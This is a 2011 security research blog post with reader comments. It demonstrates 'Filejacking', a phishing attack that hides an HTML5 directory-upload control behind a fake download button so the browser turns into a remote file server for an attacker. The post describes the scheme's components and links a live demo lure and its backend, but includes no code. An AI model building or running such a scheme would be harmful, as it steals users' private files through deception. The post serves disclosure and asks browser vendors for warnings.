Thursday, April 14, 2011

Filejacking: How to make a file server from your browser (with HTML5 of course)

Back in the days of browser wars, there was a joke: Internet Explorer is the only web browser that makes Internet browse your computer. Through various security flaws, IE was exploitable and allowed for remote code execution that could e.g. steal your sensitive files.
But now the times are different. It's not that easy to exploit current browsers, they get patched (relatively) quickly. Attackers cannot easily access your files using browsers vulnerabilities, so they turn to the weakest link - users. In this post we'll try to explore what current browsers can do with your files.

Your file, please

How can a website access user's files? Traditionally, user has to upload the file. Users commonly share photos, videos upload their files for online conversion tools etc. You could (theoretically) be tricked into uploading a sensitive file into a malicious website ("please submit your private key for checking it's strength"), but, seriously, who falls for that?

Lately, File API allowed Javascript to access the file once it is chosen by the user (i.e. before uploading it). Apart from delivering better file uploading experience, it might also be used maliciously to steal your files in XSS attack. Also, with clever styling you can hide input type=file control so that the user is unaware that he's going to upload the file. But still - the only leaked file is the one user chose using 'Open File' dialog.

Users are aware of what file uploading is and are reluctant to choose Downloaded Files/nothing here/move along/boring family photos/1/b00bs.jpg when working inside a browser, so it's not a big deal, right?

Wrong. It's 2011, web applications need new features, browsers are hurrying to implement them, sometimes security is an afterthought.

But first, a gift

I've got some gifts for youI gathered some of the latest hacking tricks for all browsers, spiced it up with an algorithm that will send you a ZIP file crafted especially for you based on your answers. Just fill out the short quiz and wait for the file download.

Update: I'm currently experiencing traffic spike on the server, generating file might take a while.

Using Chrome / Chromium please navigate to:

http://kotowicz.net/wu/

and claim your gift :)

Now back to me

input type=file directory is a splendid feature. It allows you to upload contents of a chosen directory. Great when you'd like to submit a gallery of pictures to Facebook, ain't it? Currently, it's implemented in Webkit (latest Chrome / Chromium) - not yet in Safari, Firefox or any other browser.

However it has a problem - that feature is new to users, they don't know what are it's consequences, there are no warnings either. For all they know, they're just selecting a folder using the OS native "select folder" dialog. Similar to what happens when e.g. choosing a download destination. 

While you probably didn't fell for my trick, most users are not that smart nor security-minded. And the consequences of sharing a folder are much worse than of sharing a single file. Don't believe me? See
http://attacker.kotowicz.net/wu/evil.html - the backend of the service. Or just look at the video:


File server inside your browser

The given example is another example of UI redressing attack exploting new features of HTML5. The elements of the scam:
  • a phishing site with "hacking tricks" bait
  • transparent input type=file directory over the fake download button
  • launching another window to perform real work (to survive closing initial window by the user)
  • the new window sends the file list from the chosen directory to the server
  • additionally, it uploads one sample image, if it finds one in your directory
  • .. and polls the server repeatedly for further commands
  • server control panel gets the list of connected clients and their files
  • server operator can choose the files to download
  • requests for new files reach the clients, and they send the files back
Your browser has now become a file server, serving files from your chosen directory. More features follow!
  • cross domain
  • easily served through XSS vulnerability
  • server/client could be automated to e.g. send all Excel files at once. 
  • and, it's HTML5 compatible
Nifty! 

Brave new world?

Current web applications demand more power from browsers. With features like
  • directory upload, 
  • offline storage, 
  • drag & drop support
  • extensive styling
  • audio & video support
  • WebSockets
  • notifications 
they're getting closer to desktop applications each year. Granted, they all run in a browser "sandbox" with its security policies.

However, users are not aware of what current browser can do, so they can be tricked into running the malicious app. And, with XSS being so popular, malicious app may be pretty much every site on the Internet. 

Browser vendors try to educate users and prevent them from choosing unsafe settings (Geolocation bar is an example). Shouldn't similar 'warning' be displayed when using input type=file directory ? After all, it's only one click away and the risks of sharing a whole directory are huge. So, WebKit, what do you think?

15 comments:

Spooky said...

Really impressive

Upset said...

NO NO NO! You had the opportunity. You had the ability. You had the knowledge.

But you *STILL* called it 'Filejacking'. =(

kkotowicz said...

And... ? It's just the name, and you've got to love those *jacking techniques, there's one every other week ;)

Guest said...

Lol, I selected a folder with images in it, in order to try it, but I didn't know that it will upload one sample image immediately. I hope you can remove it from the server as soon as possible :) Nice work, btw.

Marcus Niemietz said...

I think the term is very obvious. I'm waiting for the next *jacking attack. :-)

Guest said...

cool work, great demo

Solver said...

Nice work!! I tried to upload the script but it didn't work for me. When i open evil.html there is nothing showing. Can you tell me how to set up the script on my host?

lukasz said...

evil.html is disabled?

kkotowicz said...

It should be ok now (it only works on Chrome)

John Gillott said...

As your latest victim, I am quite impressed, I was looking for something to learn over the Summer in preparation for studying Computer Science university, could you direct me to any online resources that you have a found useful or think I might find beneficial? 

John Gillott said...

Thank you :)

Ron Allan Dolorosa said...

Building Fileserver in 10mins its very easy here http://personalfileserver.blogspot.com/2012/01/how.html

yahoo-AYJZF5G3Z45YMNZKFB55V4KWTM said...

I like the one where the guy pulls a rabbit out of a hat! At first, I "downloaded" the file in an empty folder so I didn't get the parlor trick. Had to really read everything to get jacked up! :-P

gron said...

Do you have the source code for me?

yheeman said...

Do you have the source code for me?